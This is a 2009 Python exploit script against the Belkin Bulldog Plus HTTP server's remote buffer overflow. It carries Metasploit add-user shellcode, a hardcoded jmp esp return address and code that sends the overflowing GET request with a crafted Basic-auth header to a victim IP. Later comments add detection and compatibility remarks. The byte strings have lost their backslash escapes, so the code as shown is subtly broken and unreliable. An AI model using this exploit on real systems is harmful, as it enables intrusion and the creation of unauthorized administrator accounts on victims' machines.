
# Title : Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit
# Published : 2009-04-27
# Author : His0k4


#!/usr/bin/python
# _  _   _         __    _     _ _  
#| || | (_)  ___  /    | |__ | | | 
#| __ | | | (_-< | () | | / / |_  _|
#|_||_| |_| /__/  __/  |__   |_| 
#
#[*] Usage   : belkin.py [victim_ip]
#[*] Bug     : Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit
#[*] Credits go to : Elazar Broad
#[*] Tested on :    Xp sp3 (EN)(VB)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com
#[*] Chabiba wa sayd el ba7ri :D

import sys, socket
import base64

# Target host is taken verbatim from the first CLI argument (see the usage line in
# the header). There is no argument check, so running without one raises IndexError.
host = sys.argv[1] 
port = 80

# win32_adduser -  PASS=27 EXITFUNC=seh USER=DZ Size=477 Encoder=PexAlphaNum http://metasploit.com
# Payload bytes as labelled by the author above (a Metasploit add-user payload,
# alphanumeric-encoded). It is placed in the HTTP request target (see `head` below),
# so on the wire it appears as an abnormally long, alphanumeric-heavy GET path --
# a useful characteristic for proxy/IDS detection of this request shape.
shellcode=(
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"
"x42x30x42x50x42x30x4bx38x45x34x4ex43x4bx58x4ex37"
"x45x50x4ax47x41x30x4fx4ex4bx38x4fx34x4ax31x4bx58"
"x4fx35x42x42x41x30x4bx4ex49x54x4bx48x46x33x4bx48"
"x41x50x50x4ex41x43x42x4cx49x49x4ex4ax46x58x42x4c"
"x46x57x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx53x46x45x46x32x46x30x45x57x45x4ex4bx48"
"x4fx45x46x42x41x50x4bx4ex48x36x4bx58x4ex30x4bx34"
"x4bx58x4fx35x4ex31x41x30x4bx4ex4bx38x4ex41x4bx38"
"x41x30x4bx4ex49x38x4ex55x46x42x46x30x43x4cx41x53"
"x42x4cx46x46x4bx48x42x34x42x53x45x48x42x4cx4ax37"
"x4ex30x4bx58x42x34x4ex30x4bx48x42x57x4ex41x4dx4a"
"x4bx38x4ax46x4ax50x4bx4ex49x50x4bx38x42x58x42x4b"
"x42x50x42x30x42x50x4bx48x4ax46x4ex53x4fx45x41x53"
"x48x4fx42x46x48x45x49x38x4ax4fx43x58x42x4cx4bx37"
"x42x35x4ax36x42x4fx4cx38x46x50x4fx55x4ax56x4ax39"
"x50x4fx4cx48x50x30x47x45x4fx4fx47x4ex43x56x4dx56"
"x46x56x50x32x45x56x4ax57x45x36x42x32x4fx52x43x56"
"x42x52x50x36x45x46x46x57x42x42x45x37x43x47x45x46"
"x44x57x42x42x46x34x4cx55x42x42x44x43x47x53x42x52"
"x4fx52x41x54x46x44x46x34x42x32x48x42x48x42x42x52"
"x50x36x45x36x46x57x42x52x4ex36x4fx56x43x56x41x46"
"x4ex56x47x36x44x57x4fx56x45x57x42x57x42x32x41x54"
"x46x36x4dx36x49x46x50x46x49x46x43x57x46x57x44x37"
"x41x46x46x37x4fx46x44x37x43x47x42x32x46x54x4cx35"
"x42x52x4fx42x41x54x46x44x46x54x42x50x5a")

jump="xFFx54x24x58" #Jump to the GET request which contains our shellcode.

ret="xFFx17x49x7E" #Friendly jmp esp "user32.dll".
# NOTE: this address is module- and build-specific. The header lists XP SP3 (EN) as
# the only tested platform, so the value is tied to that build's user32.dll layout;
# any other patch level or ASLR-enabled system would not place the same bytes there.

junk = "x41"*16

# The return address, jump stub and filler are base64-encoded and carried in the
# Basic-auth credential; the decoded value is not a "user:password" pair.
# base64.encodestring is a Python 2 API (deprecated in 3.1, removed in 3.9),
# consistent with the /usr/bin/python shebang -- this script targets Python 2.
exploit1 = base64.encodestring(ret + jump + junk)
exploit2 = shellcode

# One HTTP/1.1 request: an oversized request target plus an Authorization: Basic
# header whose decoded content is not credentials. Either property on its own is
# anomalous and is worth an alert at a reverse proxy or WAF in front of such devices.
head =  'GET '+exploit2+' HTTP/1.1rn'
head += 'Authorization: Basic '+exploit1+'rnrn'

# Fire-and-forget: a single TCP connection and a single send(). No response is
# read and no close() call appears, so the socket is left to interpreter teardown.
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(head)
